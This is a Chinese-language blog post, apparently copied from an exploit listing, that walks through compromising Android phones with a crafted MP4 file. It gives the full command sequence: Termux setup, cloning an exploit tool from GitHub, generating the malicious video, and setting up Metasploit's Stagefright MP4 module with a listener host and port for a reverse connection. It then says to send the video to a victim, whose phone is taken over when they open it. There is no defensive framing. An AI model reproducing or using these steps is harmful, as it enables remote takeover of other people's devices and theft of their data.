Android MP4文件漏洞利用技术详解

本文详细介绍了利用特制MP4文件攻击Android设备的技术流程,包括Termux环境配置、漏洞利用工具下载、Metasploit框架使用以及反向连接设置,完整展示了从环境准备到攻击执行的全过程。

Exploit-Android

2025-10-20 | CVSS 7.1

https://sploitus.com/exploit?id=5C3B3B24-793C-59F0-AE96-8333FCAEB588

Exploit-Android 通过创建恶意MP4文件入侵Android手机

首先我们进入TERMUX应用程序,然后下载专门用于制作恶意MP4文件的工具 按照以下命令操作:

1
2
3
4

apt update -y
apt upgrade -y  
pkg upgrade -y
pkg install git -y

git clone https://github.com/hatanhack/Exploit-Android

cd Exploit-Android

现在我们已进入工具文件夹,继续按照恶意文件制作命令操作:

python2 mp4.py -c 127.0.0.1 -p 4444

注意:只需将"youip"修改为你的外部或内部IP地址,将"youport"修改为你的端口号,我们建议使用4444端口

现在进入Metasploit系统,输入: • msfconsole 然后输入以下命令… • exploit/android/browser/stagefright_mp4_tx3g_64bit

set lhost 127.0.0.1 只需将上面的IP地址更改为你的IP地址 👆

set lport 4444

最后我们输入: • exploit

之后你可以将恶意视频发送给受害者手机,当对方打开时就会被入侵…

注意:需要开启端口

我的YouTube频道

https://youtube.com/channel/UCGmfv3D0tcKvHp8Tolf6Yqw

我的Telegram频道

https://t.me/termuxalsharabi

博客

https://termuxalsharabi.blogspot.com

作者:Saddam Al-Sharabi

comments powered by Disqus
© 2020 - 2025 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次